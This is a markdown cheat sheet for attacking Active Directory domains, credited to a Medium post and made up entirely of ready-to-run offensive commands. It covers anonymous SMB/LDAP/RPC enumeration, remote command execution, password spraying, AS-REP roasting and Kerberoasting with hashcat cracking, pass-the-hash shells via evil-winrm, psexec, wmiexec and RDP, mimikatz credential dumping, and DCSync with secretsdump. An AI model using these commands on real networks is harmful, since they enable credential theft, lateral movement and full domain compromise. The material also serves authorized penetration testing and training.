# Useful Active Directory Commands
> A cheat sheet for pentesting active directory

*Source: https://medium.com/@hyphens443/attacking-domain-controllers-a45b9cb9651c*

- `rustscan -b 5000 -t 2000 --ulimit 5000 [IP] #optionally: -- [nmap flags]`
- `cme smb [IP] -u '' -p '' --shares --pass-pol`
- `cme smb [IP] -u '' -p '' -X 'whoami'`
- `cme winrm [IP] -u '' -p ''`
- `smbclient -L \\\\[IP]\\`
- `smbclient \\\\[IP]\\[Share name]`
- `rpcclient -U '' [IP]`
    - #optionally: -N (do not ask for a password)
- `ldapsearch -x -h [IP] -s base namingcontexts`
- `ldapsearch -x -h [IP] -s sub -b 'DC=,DC=' > outputfile.txt`

## Creating a list of valid usernames retrieved from RPC
- `cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' > valid_users.txt`

## Password spraying
- `./kerbrute passwordspray -d [DN] --dc [DN/IP] users.txt password`
- `cme smb [IP] -u users.txt -p passwords.txt #optionally: --shares --pass-pol`

## AS-REP roast
- `GetNPUsers.py -dc-ip [DC IP] [DN]/[username] -no-pass`
- `hashcat.exe -m 18200 hash.txt rockyou.txt -O`

## Kerberoasting
- `GetUserSPNs.py [DN]/[username]:[password] -request`
- `rubeus.exe kerberoast /creduser:[DN]\[username] /credpassword:[user's password] /outfile:[outfile] /format:[hashcat/john]`
- `hashcat.exe -m 13100 hash.txt rockyou.txt -O`

## Accessing the box
- `./evil-winrm.rb -i [DN/IP] -u [username] -p '[password]'`
- `./evil-winrm.rb -i [DN/IP] -u [username] -H [HASH]`
- `psexec.py -hashes [hash] [DN]/[username]@[IP]`
- `smbexec.py -hashes [hash] [DN]/[username]@[IP]`
- `wmiexec.py -hashes [hash] [DN]/[username]@[IP]`
- `psexec.py [DN]/[username]:[password]@[IP]`
- `smbexec.py [DN]/[username]:[password]@[IP]`
- `wmiexec.py [DN]/[username]:[password]@[IP]`
- `xfreerdp /u:[username] /p:[password] /v:[IP]`
- `xfreerdp /u:[username] /pth:[NT hash] /v:[IP]`
- `pth-winexe -U [DN]/[username]%[hash] //[IP] cmd`

## Authentication through a SSL connection
- `./evil-winrm.rb -S -i [DN/IP] -u [username] -p '[password]' -c [certificate file] -k [private key]`

## Dumping password hashes/credentials
- `mimikatz.exe`
- `privilege::debug`
- `token::elevate`
- `lsadump::sam #or lsadump::lsa`
- `sekurlsa::logonPasswords #to obtain credentials of currently logged users`

## DCSync
- `secretsdump.py [DN]/[username]:[password]@[DN] -dc-ip [IP]`

## Cracking NTLM and NTLMv2 hashes with Hashcat
- NTLM
    - `hashcat.exe -m 1000 hash.txt wordlist.txt`
- NTLMv2
    - `hashcat.exe -m 5600 hash.txt wordlist.txt`